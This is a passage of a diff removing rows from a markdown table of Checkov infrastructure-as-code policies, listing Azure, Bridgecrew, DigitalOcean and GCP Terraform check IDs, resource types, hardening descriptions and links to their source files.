-| 1573 | CKV2_AZURE_44   | resource | azurerm_mysql_server                                    | Ensure Azure MySQL server is configured with private endpoint                                                                                                                                            | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml)                                               |
-| 1574 | CKV2_AZURE_45   | resource | azurerm_mssql_server                                    | Ensure Microsoft SQL server is configured with private endpoint                                                                                                                                          | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml)                                               |
-| 1575 | CKV2_AZURE_46   | resource | azurerm_synapse_workspace_security_alert_policy         | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                             |
-| 1576 | CKV2_AZURE_46   | resource | azurerm_synapse_workspace_vulnerability_assessment      | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                             |
-| 1577 | CKV2_AZURE_47   | resource | azurerm_storage_account                                 | Ensure storage account is configured without blob anonymous access                                                                                                                                       | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml)               |
-| 1578 | CKV_BCW_1       | provider | bridgecrew                                              | Ensure no hard coded API token exist in the provider                                                                                                                                                     | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py)                                                                                          |
-| 1579 | CKV_DIO_1       | resource | digitalocean_spaces_bucket                              | Ensure the Spaces bucket has versioning enabled                                                                                                                                                          | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py)                                                                  |
-| 1580 | CKV_DIO_2       | resource | digitalocean_droplet                                    | Ensure the droplet specifies an SSH key                                                                                                                                                                  | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py)                                                                                  |
-| 1581 | CKV_DIO_3       | resource | digitalocean_spaces_bucket                              | Ensure the Spaces bucket is private                                                                                                                                                                      | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py)                                                                  |
-| 1582 | CKV_DIO_4       | resource | digitalocean_firewall                                   | Ensure the firewall ingress is not wide open                                                                                                                                                             | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py)                                                                        |
-| 1583 | CKV_GCP_1       | resource | google_container_cluster                                | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters                                                                                                                               | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py)                                                                                     |
-| 1584 | CKV_GCP_2       | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted ssh access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py)                                   |
-| 1585 | CKV_GCP_3       | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted rdp access                                                                                                                            | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py)                               |
-| 1586 | CKV_GCP_4       | resource | google_compute_ssl_policy                               | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites                                                                                                                  | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py)                                                                           |
-| 1587 | CKV_GCP_6       | resource | google_sql_database_instance                            | Ensure all Cloud SQL database instance requires all incoming connections to use SSL                                                                                                                      | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py)                                                       |
-| 1588 | CKV_GCP_7       | resource | google_container_cluster                                | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters                                                                                                                             | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py)                                                                               |
-| 1589 | CKV_GCP_8       | resource | google_container_cluster                                | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters                                                                                                                            | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py)                                                                               |
-| 1590 | CKV_GCP_9       | resource | google_container_node_pool                              | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters                                                                                                                                        | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py)                                                               |
-| 1591 | CKV_GCP_10      | resource | google_container_node_pool                              | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters                                                                                                                                       | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py)                                                             |
-| 1592 | CKV_GCP_11      | resource | google_sql_database_instance                            | Ensure that Cloud SQL database Instances are not open to the world                                                                                                                                       | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py)                                       |
-| 1593 | CKV_GCP_12      | resource | google_container_cluster                                | Ensure Network Policy is enabled on Kubernetes Engine Clusters                                                                                                                                           | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py)                                                                         |
-| 1594 | CKV_GCP_13      | resource | google_container_cluster                                | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled                                                                                                                       | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py)                                                               |
-| 1595 | CKV_GCP_14      | resource | google_sql_database_instance                            | Ensure all Cloud SQL database instance have backup configuration enabled                                                                                                                                 | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py)                                                     |
-| 1596 | CKV_GCP_15      | resource | google_bigquery_dataset                                 | Ensure that BigQuery datasets are not anonymously or publicly accessible                                                                                                                                 | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py)                                                           |
-| 1597 | CKV_GCP_16      | resource | google_dns_managed_zone                                 | Ensure that DNSSEC is enabled for Cloud DNS                                                                                                                                                              | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py)                                                                       |
-| 1598 | CKV_GCP_17      | resource | google_dns_managed_zone                                 | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC                                                                                                            | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py)                                                             |
-| 1599 | CKV_GCP_18      | resource | google_container_cluster                                | Ensure GKE Control Plane is not public                                                                                                                                                                   | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py)                                                                             |
-| 1600 | CKV_GCP_19      | resource | google_container_cluster                                | Ensure GKE basic auth is disabled                                                                                                                                                                        | Terraform | [GKEBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py)                                                                                               |
-| 1601 | CKV_GCP_20      | resource | google_container_cluster                                | Ensure master authorized networks is set to enabled in GKE clusters                                                                                                                                      | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py)                                                   |
-| 1602 | CKV_GCP_21      | resource | google_container_cluster                                | Ensure Kubernetes Clusters are configured with Labels                                                                                                                                                    | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py)                                                                                               |
-| 1603 | CKV_GCP_22      | resource | google_container_node_pool                              | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image                                                                                                                    | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py)                                                                                           |
-| 1604 | CKV_GCP_23      | resource | google_container_cluster                                | Ensure Kubernetes Cluster is created with Alias IP ranges enabled                                                                                                                                        | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py)                                                                                     |
-| 1605 | CKV_GCP_24      | resource | google_container_cluster                                | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters                                                                                                                         | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py)                                                                 |
-| 1606 | CKV_GCP_25      | resource | google_container_cluster                                | Ensure Kubernetes Cluster is created with Private cluster enabled                                                                                                                                        | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py)                                                                         |
-| 1607 | CKV_GCP_26      | resource | google_compute_subnetwork                               | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network                                                                                                                                   | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py)                                                           |
-| 1608 | CKV_GCP_27      | resource | google_project                                          | Ensure that the default network does not exist in a project                                                                                                                                              | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py)                                                                 |
-| 1609 | CKV_GCP_28      | resource | google_storage_bucket_iam_binding                       | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                               |
-| 1610 | CKV_GCP_28      | resource | google_storage_bucket_iam_member                        | Ensure that Cloud Storage bucket is not anonymously or publicly accessible                                                                                                                               | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py)                                                               |
-| 1611 | CKV_GCP_29      | resource | google_storage_bucket                                   | Ensure that Cloud Storage buckets have uniform bucket-level access enabled                                                                                                                               | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py)                                                       |
-| 1612 | CKV_GCP_30      | resource | google_compute_instance                                 | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 1613 | CKV_GCP_30      | resource | google_compute_instance_from_template                   | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 1614 | CKV_GCP_30      | resource | google_compute_instance_template                        | Ensure that instances are not configured to use the default service account                                                                                                                              | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py)                                                   |
-| 1615 | CKV_GCP_31      | resource | google_compute_instance                                 | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 1616 | CKV_GCP_31      | resource | google_compute_instance_from_template                   | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 1617 | CKV_GCP_31      | resource | google_compute_instance_template                        | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs                                                                                           | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py)                               |
-| 1618 | CKV_GCP_32      | resource | google_compute_instance                                 | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 1619 | CKV_GCP_32      | resource | google_compute_instance_from_template                   | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 1620 | CKV_GCP_32      | resource | google_compute_instance_template                        | Ensure 'Block Project-wide SSH keys' is enabled for VM instances                                                                                                                                         | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py)                                                               |
-| 1621 | CKV_GCP_33      | resource | google_compute_project_metadata                         | Ensure oslogin is enabled for a Project                                                                                                                                                                  | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py)                                                                 |
-| 1622 | CKV_GCP_34      | resource | google_compute_instance                                 | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 1623 | CKV_GCP_34      | resource | google_compute_instance_from_template                   | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 1624 | CKV_GCP_34      | resource | google_compute_instance_template                        | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances)                                             | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py)                                                               |
-| 1625 | CKV_GCP_35      | resource | google_compute_instance                                 | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 1626 | CKV_GCP_35      | resource | google_compute_instance_from_template                   | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 1627 | CKV_GCP_35      | resource | google_compute_instance_template                        | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance                                                                                                                                | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py)                                                                       |
-| 1628 | CKV_GCP_36      | resource | google_compute_instance                                 | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 1629 | CKV_GCP_36      | resource | google_compute_instance_from_template                   | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 1630 | CKV_GCP_36      | resource | google_compute_instance_template                        | Ensure that IP forwarding is not enabled on Instances                                                                                                                                                    | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py)                                                                           |
-| 1631 | CKV_GCP_37      | resource | google_compute_disk                                     | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py)                                                                 |
-| 1632 | CKV_GCP_38      | resource | google_compute_instance                                 | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                             | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py)                                                         |
-| 1633 | CKV_GCP_39      | resource | google_compute_instance                                 | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 1634 | CKV_GCP_39      | resource | google_compute_instance_from_template                   | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 1635 | CKV_GCP_39      | resource | google_compute_instance_template                        | Ensure Compute instances are launched with Shielded VM enabled                                                                                                                                           | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py)                                                                         |
-| 1636 | CKV_GCP_40      | resource | google_compute_instance                                 | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 1637 | CKV_GCP_40      | resource | google_compute_instance_from_template                   | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 1638 | CKV_GCP_40      | resource | google_compute_instance_template                        | Ensure that Compute instances do not have public IP addresses                                                                                                                                            | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py)                                                                         |
-| 1639 | CKV_GCP_41      | resource | google_project_iam_binding                              | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                               |
-| 1640 | CKV_GCP_41      | resource | google_project_iam_member                               | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level                                                                                  | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py)                                                               |
-| 1641 | CKV_GCP_42      | resource | google_project_iam_member                               | Ensure that Service Account has no Admin privileges                                                                                                                                                      | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py)                                                       |
-| 1642 | CKV_GCP_43      | resource | google_kms_crypto_key                                   | Ensure KMS encryption keys are rotated within a period of 90 days                                                                                                                                        | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py)                                                                         |
-| 1643 | CKV_GCP_44      | resource | google_folder_iam_binding                               | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                             |
-| 1644 | CKV_GCP_44      | resource | google_folder_iam_member                                | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level                                                                                                    | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py)                                                             |
-| 1645 | CKV_GCP_45      | resource | google_organization_iam_binding                         | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                   |
-| 1646 | CKV_GCP_45      | resource | google_organization_iam_member                          | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level                                                                                             | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py)                                                                   |
-| 1647 | CKV_GCP_46      | resource | google_project_iam_binding                              | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                       |
-| 1648 | CKV_GCP_46      | resource | google_project_iam_member                               | Ensure Default Service account is not used at a project level                                                                                                                                            | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py)                                       |
-| 1649 | CKV_GCP_47      | resource | google_organization_iam_binding                         | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                               |
-| 1650 | CKV_GCP_47      | resource | google_organization_iam_member                          | Ensure default service account is not used at an organization level                                                                                                                                      | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py)                                               |
-| 1651 | CKV_GCP_48      | resource | google_folder_iam_binding                               | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                         |
-| 1652 | CKV_GCP_48      | resource | google_folder_iam_member                                | Ensure Default Service account is not used at a folder level                                                                                                                                             | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py)                                         |
-| 1653 | CKV_GCP_49      | resource | google_project_iam_binding                              | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                           |
-| 1654 | CKV_GCP_49      | resource | google_project_iam_member                               | Ensure roles do not impersonate or manage Service Accounts used at project level                                                                                                                         | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py)                                                           |
-| 1655 | CKV_GCP_50      | resource | google_sql_database_instance                            | Ensure MySQL database 'local_infile' flag is set to 'off'                                                                                                                                                | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py)                                                           |
-| 1656 | CKV_GCP_51      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on'                                                                                                                                         | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py)                                                 |
-| 1657 | CKV_GCP_52      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_connections' flag is set to 'on'                                                                                                                                         | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py)                                                   |
-| 1658 | CKV_GCP_53      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on'                                                                                                                                      | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py)                                             |
-| 1659 | CKV_GCP_54      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on'                                                                                                                                          | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py)                                                     |
-| 1660 | CKV_GCP_55      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value                                                                                                                               | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py)                                                   |
-| 1661 | CKV_GCP_56      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_temp_files flag is set to '0'                                                                                                                                            | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py)                                                               |
-| 1662 | CKV_GCP_57      | resource | google_sql_database_instance                            | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1'                                                                                                                              | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py)                                                 |
-| 1663 | CKV_GCP_58      | resource | google_sql_database_instance                            | Ensure SQL database 'cross db ownership chaining' flag is set to 'off'                                                                                                                                   | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py)                               |
-| 1664 | CKV_GCP_59      | resource | google_sql_database_instance                            | Ensure SQL database 'contained database authentication' flag is set to 'off'                                                                                                                             | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py)                             |
-| 1665 | CKV_GCP_60      | resource | google_sql_database_instance                            | Ensure Cloud SQL database does not have public IP                                                                                                                                                        | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py)                                                           |
